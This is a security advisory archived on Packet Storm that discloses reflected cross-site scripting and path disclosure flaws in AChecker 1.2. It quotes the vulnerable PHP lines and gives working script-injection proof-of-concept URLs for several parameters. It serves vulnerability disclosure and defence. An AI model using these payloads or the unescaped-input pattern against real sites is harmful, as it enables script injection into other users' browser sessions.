exploit the possibilities

ATutor AChecker 1.2 Cross Site Scripting / Path Disclosure

ATutor AChecker 1.2 Cross Site Scripting / Path Disclosure
Posted Aug 6, 2011
Authored by LiquidWorm | Site zeroscience.mk

ATutor AChecker version 1.2 suffers from cross site scripting and path disclosure vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | f051fdf159320c7c589e285d8b88bea2bf95dbf5dda51944394344650d558b95

ATutor AChecker 1.2 Cross Site Scripting / Path Disclosure

Change Mirror Download

AChecker 1.2 Multiple Remote XSS/PD Vulnerabilities


Vendor: ATutor (Inclusive Design Institute)
Product web page: http://www.atutor.ca
Affected version: 1.2 (build r530)

Summary: AChecker is an open source Web accessibility evaluation tool.
It can be used to review the accessibility of Web pages based on a variety
international accessibility guidelines.

Desc: AChecker suffers from multiple cross-site scripting and path disclosure
vulnerabilities. Input thru the GET parameters 'id', 'p' and 'myown_patch_id'
in several scripts is not sanitized allowing the attacker to execute HTML code
into user's browser session on the affected site and/or disclose the full path
of application's residence ;].


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

- Parameter: id
- Type: GET
- Script: language_add_edit.tmpl.php
- Vulnerable code:
----------------------------------------------------
/themes/default/language/language_add_edit.tmpl.php:
----------------------------------------------------

Line 20: <form name="input_form" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?><?php if (isset($_GET["id"])) echo '?id='.$_GET["id"]; ?>" >

----------------------------------------------------

- PoC: http://localhost/themes/default/language/language_add_edit.tmpl.php?id=210"><script>alert('zsl')</script>

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

- Parameter: p
- Type: GET
- Script: frame_header.php
- Vulnerable code:
----------------------------------------------------
/documentation/frame_header.php:
----------------------------------------------------

Line 17: if (isset($_GET['p'])) {
Line 18: $this_page = htmlentities($_GET['p']);
Line 19: } else {
Line 20: exit;
Line 21: }

----------------------------------------------------

- PoC: http://localhost/documentation/frame_header.php?p="><script>alert('zsl')</script>

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

- Parameter: id
- Type: GET
- Script: user_group_create_edit.tmpl.php
- Vulnerable code:
----------------------------------------------------
/themes/default/user/user_group_create_edit.tmpl.php:
----------------------------------------------------

Line 20: <form name="input_form" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?><?php if (isset($_GET["id"])) echo '?id='.$_GET["id"]; ?>" >

----------------------------------------------------

- PoC: http://localhost/themes/default/user/user_group_create_edit.tmpl.php?id=188"><script>alert('zsl')</script>

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

- Parameter: myown_patch_id
- Type: GET
- Script: patch_edit.php
- Vulnerable code:
----------------------------------------------------
/updater/patch_edit.php:
----------------------------------------------------

Line 20: if (!isset($_REQUEST["myown_patch_id"]))
Line 21: {
Line 22: $msg->addError('NO_ITEM_SELECTED');
Line 23: exit;
Line 24: }
Line 25:
Line 26: $myown_patch_id = $_REQUEST["myown_patch_id"];

----------------------------------------------------

- PoC: http://localhost/updater/patch_edit.php?lang=144&myown_patch_id=144"><script>alert('zsl')</script>

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

- Parameter: id
- Type: GET
- Script: user_create_edit.php
- Vulnerable code:
----------------------------------------------------
/user/user_create_edit.php:
----------------------------------------------------

Line 103: if (isset($_GET['id'])) // edit existing user
Line 104: {
Line 105: $usersDAO = new UsersDAO();
Line 106: $savant->assign('user_row', $usersDAO->getUserByID($_GET['id']));
Line 107: $savant->assign('show_password', false);
Line 108:
Line 109: }

----------------------------------------------------

- PoC: http://localhost/user/user_create_edit.php?id=78"><script>alert('zsl')</script>

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.14 (Win32)
PHP 5.3.1
MySQL 5.1.41


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk


Advisory ID: ZSL-2011-5035
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5035.php


01.08.2011


t00t!
Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    6 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close